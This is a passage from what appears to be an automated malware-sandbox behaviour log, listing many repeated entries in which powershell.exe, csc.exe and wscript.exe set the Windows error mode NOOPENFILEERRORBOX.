Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
